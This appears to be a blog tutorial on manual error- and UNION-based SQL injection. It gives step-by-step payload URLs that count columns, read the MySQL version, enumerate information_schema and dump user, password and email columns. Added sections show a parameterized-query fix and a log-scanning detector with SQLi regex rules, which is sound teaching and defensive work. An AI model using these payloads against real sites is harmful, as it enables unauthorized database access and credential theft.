SQL injection from the start

First things first: what actually is SQL injection?

Most web applications store their data in a backend database, which is normally not directly reachable from outside. Sometimes you find that the developer made a mistake or simply forgot to sanitize user input; in that case we can perform SQL injection to manipulate data and run SQL commands.
Today SQL injection is one of the most common vulnerabilities in web applications.
In simple words, it allows an attacker to execute database queries through the web application and gain access to critical data.
So in this blog we'll cover a single type of SQL injection: manual, error-based or UNION-based SQL injection.
Here we go, step by step, right below.

1. Checking whether the web application is vulnerable to SQL injection

Just for a while, imagine our URL looks like this:

http://vulnerable.url/results.php?id=26

Now, to test it, we add a ' (single quote) at the end of the URL:

http://vulnerable.url/results.php?id=26'

So if we get an error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version …”
or something similar from MySQL, that means it is vulnerable to SQL injection.
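To see why the stray quote breaks the query, and what the fixed code looks like, here is an added example that is not from the original post. It is a small Python script using an in-memory SQLite database (the post talks about MySQL; SQLite is used here only so it runs offline) with a handler that concatenates id into the SQL string, as results.php evidently does, next to a hardened handler that validates the type and binds the value as a parameter. The table, rows and function names are all constructed for the illustration.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the post's MySQL backend (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE results (id INTEGER, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO results VALUES (?, ?, ?)",
        [(26, "entry 26", "public text"), (27, "entry 27", "more text")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors results.php?id=...: the raw parameter is pasted into the SQL string.
    A quote in the input changes the statement's grammar, which is what step 1 detects."""
    sql = "SELECT id, title FROM results WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: check the type first, then bind the value as a parameter.
    The input is sent as data and can never become part of the SQL grammar."""
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, title FROM results WHERE id = ?", (int(user_id),)
    ).fetchall()


def probe(conn, fn, user_id):
    """Return ('ok', rows) or ('error', message) so both handlers can be compared side by side."""
    try:
        return ("ok", fn(conn, user_id))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    # The three inputs from the post: a normal id, the quote test, and a UNION probe.
    for payload in ["26", "26'", "26 union all select 1,2--"]:
        print(repr(payload), "vulnerable:", probe(conn, lookup_vulnerable, payload))
        print(repr(payload), "safe:      ", probe(conn, lookup_safe, payload))
```

Run it and the vulnerable handler reports a syntax error for 26' (the MySQL equivalent is the message quoted above) and returns extra rows for a UNION, while the hardened handler rejects both inputs before any SQL is built. Parameter binding is the actual fix; the integer check on top is defence in depth, not a substitute for it.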

2. Now find the number of columns the vulnerable query selects.

For that we use ORDER BY (this tells the database how to order the result),

so we just increment the number until we get an error.

http://vulnerable.url/results.php?id=26 order by 1/* <-- no error

http://vulnerable.url/results.php?id=26 order by 2/* <-- no error

http://vulnerable.url/results.php?id=26 order by 3/* <-- no error
...

http://vulnerable.url/results.php?id=26 order by 7/* <-- error

#we get something like: Unknown column '7' in 'order clause', or similar#

That indicates it has 6 columns, because we got an error on 7.

3. Check for the UNION function

With UNION we can select more data in one SQL statement.

http://vulnerable.url/results.php?id=26 union all select 1,2,3,4,5,6/*

#we already found that the number of columns is 6#

If we see some numbers on the screen, i.e. 1 or 2 or 3 or any other, then the UNION works 🙂

NOTE:
If /* isn't working for you and you get an error, then try -- or ?id=-26 -- -
Example:
http://vulnerable.url/results.php?id=26 union all select 1,2,3,4,5,6--
OR
http://vulnerable.url/results.php?id=-26 union all select 1,2,3,4,5,6-- -

4. Check the MySQL version

For instance, we have the number 4 on the screen; now, to check the version, we replace the number 4 with @@version or version() and we get something like 4.1.33 or 5.0.45.

It should look like this:

http://vulnerable.url/results.php?id=26 union all select 1,2,3,@@version,5,6--

5. Getting table and column names

We use information_schema, as it holds all the tables and columns in the database.

For the database name:

http://vulnerable.url/results.php?id=26 union all select 1,2,3,database(),5,6--

For tables:

http://vulnerable.url/results.php?id=26 union all select 1,2,3,table_name,5,6 from information_schema.tables--
OR
http://vulnerable.url/results.php?id=26 union all select 1,2,3,group_concat(table_name),5,6 from information_schema.table_constraints--

We replace 4 with table_name to get the first table from information_schema.tables.

Here you get some tables like username, user, login, password, pass, passwd etc.
To display the column names for a specific table:

http://vulnerable.url/results.php?id=26 union all select 1,2,3,column_name,5,6 from information_schema.columns where table_name='user'--
OR
http://vulnerable.url/results.php?id=26 union all select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name='user'--

Now you have some specific columns like id, user, pass; to view them use

http://vulnerable.url/results.php?id=26 union all select 1,2,3,group_concat(id,0x3a,user,0x3a,pass),5,6 from user--
OR
http://vulnerable.url/results.php?id=26 union all select 1,2,3,concat(user,0x3a,pass,0x3a,email),5,6 from users--

This will give us the data in the form “user:pass:email” from the table users.
Note: 0x3a is the hex code for “:”; we use it to separate the values.
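From the defender's side, every probe in steps 1 to 5 leaves a distinctive trace in the web server access log: a dangling quote, ORDER BY with an increasing number, UNION ... SELECT, references to information_schema and a trailing comment marker. The following is an added example, not part of the original post, of a small Python log scanner that decodes each request's query string (so %20 and + do not hide keywords) and applies those patterns. The log lines are constructed for the example in Apache combined format, and the rule names are invented for it.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real server). The suspicious ones
# mirror the probes described in the steps above; the last two are benign look-alikes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /results.php?id=26 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /results.php?id=26' HTTP/1.1" 500 210
10.0.0.5 - - [10/Oct/2023:13:55:52 +0000] "GET /results.php?id=26%20order%20by%207/* HTTP/1.1" 500 198
10.0.0.5 - - [10/Oct/2023:13:56:03 +0000] "GET /results.php?id=-26%20union%20all%20select%201,2,3,@@version,5,6--%20- HTTP/1.1" 200 640
10.0.0.5 - - [10/Oct/2023:13:56:30 +0000] "GET /results.php?id=26%20union%20all%20select%201,2,3,group_concat(table_name),5,6%20from%20information_schema.tables-- HTTP/1.1" 200 1201
10.0.0.9 - - [10/Oct/2023:13:57:11 +0000] "GET /results.php?id=27&sort=name HTTP/1.1" 200 530
10.0.0.9 - - [10/Oct/2023:13:58:00 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 800
"""

# Apache combined-format request line: client, timestamp, method, path, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is (name, regex) applied to the decoded, lower-cased query string.
RULES = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+")),
    ("schema-enum", re.compile(r"\binformation_schema\.")),
    ("sql-comment-tail", re.compile(r"(--|/\*)(\s|-)*$")),
    ("dangling-quote", re.compile(r"=\s*-?\d+'")),
]


def classify_request(path):
    """Decode the query string the way the database would see it and return the matching rule names."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1]).lower()
    return [name for name, rx in RULES if rx.search(query)]


def scan_log(text):
    """Return (ip, status, path, rules) for every request that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        rules = classify_request(m["path"])
        if rules:
            hits.append((m["ip"], int(m["status"]), m["path"], rules))
    return hits


if __name__ == "__main__":
    for ip, status, path, rules in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {path}\n    -> {', '.join(rules)}")
```

The decode step matters: matching against the raw, percent-encoded URL misses order%20by. The last sample line shows why the first rule insists on union followed by select: union on its own is an ordinary word in search queries. A trailing -- or /* is flagged on its own because it appears in every variant of the probes in step 3. Tune the rules to the site, and treat a 500 status paired with a quote, as in the second hit, as the strongest signal that the application really passed the input to the database.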

Still stuck at some point? Just comment below 🙂
